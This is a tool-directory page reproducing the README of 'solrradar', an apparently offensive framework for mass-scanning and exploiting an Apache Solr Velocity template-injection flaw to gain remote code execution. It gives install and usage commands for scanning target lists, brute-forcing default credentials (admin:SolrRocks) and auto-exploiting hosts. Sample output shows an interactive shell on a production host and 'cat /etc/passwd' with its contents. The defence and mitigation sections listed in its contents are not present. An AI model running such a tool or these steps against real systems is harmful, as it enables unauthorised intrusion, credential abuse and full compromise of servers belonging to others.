Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
solrradar — ☄️ Mass reconnaissance & exploitation framework for Apache Solr CVE-2026-44825 — Velocity template injection to RCE | Kitploit
Tools/GitHubGitHub/shinthink/solrradar
ReconnaissanceVulnerability ScannersPassword AttacksExploitationWeb Application ExploitationInformation GatheringPenetration TestingCommand and ControlRed TeamingPayload Development
GitHub
51542 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
shinthink/solrradar

solrradar

☄️ Mass reconnaissance & exploitation framework for Apache Solr CVE-2026-44825 — Velocity template injection to RCE

View Repository

SolrRadar — CVE-2026-44825 Apache Solr Scanner

Python CVE License

Threads Version Brute RCE Shell

Mass Reconnaissance & Exploitation Framework for Apache Solr

Velocity Template Injection → Remote Code Execution



📑 Table of Contents

  • Vulnerability Overview
  • Affected Versions
  • Features
  • Installation
  • Usage
  • Proof of Concept
  • Technical Deep-Dive
  • Detection Methodology
  • Defense & Mitigation
  • Disclaimer
  • References

🔴 Vulnerability Overview

CVE-2026-44825 is a critical-severity vulnerability in Apache Solr that allows attackers to achieve unauthenticated Remote Code Execution (RCE) through Velocity template injection.

The Problem

Apache Solr's /select endpoint accepts a wt=velocity parameter that renders user-supplied Velocity templates. When the Velocity Response Writer is enabled (or can be enabled via configuration API), an attacker can inject a malicious template that calls java.lang.Runtime.exec(), executing arbitrary system commands with the privileges of the Solr process.

Impact

VectorSeverityImpact
Unauthenticated RCE9.8 (Critical)Full system compromise
Authenticated RCE8.8 (High)Post-auth code execution
Information Disclosure5.3 (Medium)Core/collection enumeration

The Velocity Template Engine

Apache Solr bundles Apache Velocity as an optional template engine for response rendering. The vulnerability lies in Solr's VelocityResponseWriter which processes user-controlled template parameters without adequate sanitization, allowing direct invocation of Java reflection APIs:

Java Reflection Chain:
vtl → Class.forName("java.lang.Runtime") → getRuntime().exec(cmd)

🟠 Affected Versions

Apache Solr VersionStatusNotes
9.4.0 – 9.10.1🔴 VulnerableActive exploitation in the wild
10.0.0🔴 VulnerableInitial 10.x release affected
10.0.1+🟢 PatchedFix backported
9.10.2+🟢 PatchedPatch release available
≤ 9.3.x🟢 Not AffectedVelocity Response Writer not present
8.x (all)🟢 Not AffectedNo Velocity support

Note: Version checks are performed automatically by parsing /admin/info/system JSON response.


✨ Features

🔍 Reconnaissance

  • Multi-target scanning — 30 concurrent threads, configurable
  • Version fingerprinting — Exact Solr & Lucene version extraction
  • Dual-mode detection — SolrCloud + Standalone (single-node)
  • Auth-aware probing — Tests 3 admin endpoints for Basic Auth
  • Collection enumeration — Lists collections/cores without auth when possible

💀 Exploitation

  • Credential brute-force — Built-in dictionary of default Solr credentials
  • Velocity RCE — Template injection via java.lang.Runtime.exec()
  • Interactive shell — Pseudo-terminal for post-exploitation commands
  • Auto-exploit chain — Detect → brute → RCE in one command
  • JSON export — Structured output for integration with other tools

📦 Installation

# Clone the repository
git clone https://github.com/shinthink/solrradar.git
cd solrradar

# Install dependencies
pip install -r requirements.txt

# Verify
python solr_scanner.py --help

Requirements

requests>=2.28.0
urllib3>=1.26.0

Only standard libraries + requests. No exotic dependencies.


📖 Usage

Command Line Arguments

CVE-2026-44825 Apache Solr Scanner

  -t, --target     Single target URL or IP[:port]
  -f, --file       File containing targets (one per line, # for comments)
  --exploit        Auto-exploit if vulnerable credentials are found
  --rce            Launch interactive shell after authentication
  -u, --user       Username for Basic Auth
  -pw, --password  Password for Basic Auth
  -o, --output     JSON output file path          (default: solr_results.json)
  -w, --workers    Number of concurrent threads   (default: 30)
  -T, --timeout    HTTP request timeout (seconds) (default: 8)

Basic Scanning

# Single target
python solr_scanner.py -t 192.168.1.100:8983

# Single target with custom path
python solr_scanner.py -t http://example.com/solr

# Mass scan from file
python solr_scanner.py -f targets.txt -o results.json

Target File Format

# targets.txt — supports comments and blank lines
192.168.10.10:8983
192.168.10.20:8983
http://solr-target.internal/solr
192.168.1.0/24          # (CIDR not supported; pre-expand with external tool)

Exploitation

# Scan + auto-exploit if creds found
python solr_scanner.py -f targets.txt --exploit

# Known credentials + interactive shell
python solr_scanner.py -t target:8983 --rce -u admin -pw SolrRocks

# Auto brute-force + shell on success
python solr_scanner.py -t target:8983 --rce

🧪 Proof of Concept

Scenario 1: Detection & Version Fingerprinting

$ python solr_scanner.py -f targets.txt
CVE-2026-44825 Apache Solr Scanner

Targets: 3 | Threads: 30 | Timeout: 8s
Scanning...

[Solr 8.11.2] http://192.168.10.10:8983/solr
[Solr 8.11.2] http://192.168.10.20:8983/solr
    Cols (no auth): ['authority', 'dfa', 'oai', 'search']
[Solr 9.4.1] VULN +Auth http://solr-target.internal/solr

Done. Total:3 | Solr:3 | Vuln:1

All 3 targets detected. The 9.4.1 instance is flagged vulnerable with Basic Auth enabled.


Scenario 2: Credential Brute-Force

$ python solr_scanner.py -t solr-target.internal
CVE-2026-44825 Apache Solr Scanner

[Solr 9.4.1] VULN +Auth http://solr-target.internal/solr
    [!] admin:SolrRocks
    Cols: ['cms', 'users', 'search', 'analytics']

Default credential admin:SolrRocks grants access to Solr admin APIs. Four collections discovered.


Scenario 3: Authenticated RCE via Velocity Injection

$ python solr_scanner.py -t target:8983 --rce -u admin -pw SolrRocks
CVE-2026-44825 Apache Solr Scanner

[+] admin:SolrRocks

solr$ id
uid=8983(solr) gid=8983(solr) groups=8983(solr)

solr$ hostname
solr-prod-cms-01.internal

solr$ whoami
solr

solr$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
solr:x:8983:8983:Solr:/var/solr:/sbin/nologin
...

solr$ exit

Full interactive shell access with the privileges of the Solr Java process.


Download Tool